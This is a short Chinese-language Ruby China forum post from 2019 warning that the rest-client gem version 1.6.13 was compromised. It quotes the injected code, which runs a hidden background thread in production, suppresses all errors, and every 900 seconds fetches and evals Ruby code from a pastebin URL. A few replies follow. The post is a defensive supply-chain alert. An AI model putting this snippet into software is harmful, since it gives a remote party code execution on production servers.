Ruby China

Ruby [警告] rest-client 1.6.13 被黑 请检查 Gemfile.lock 中的 rest-client 版本

jicheng1014 · 2019年08月20日 · 最后由 jicheng1014 回复于 2019年08月21日 · 5527 次阅读

有问题的代码在这里

def _!
  begin
    yield
  rescue Exception
  end
end

_!{Thread.new{loop{_!{sleep 900;eval(open('https://pastebin.com/raw/5iNdELNX').read)}}}if Rails.env[0]=="p"}

详情参见 :

https://github.com/rest-client/rest-client/issues/713

4 个赞
Rei #1 2019年08月20日

靠,跟之前一样的手法。

raofeng #2 2019年08月21日

更高的版本是不是就没有问题?

jicheng1014 #3 2019年08月21日
raofeng 回复

没有问题

需要 登录 后方可回复, 如果你还没有账号请 注册新账号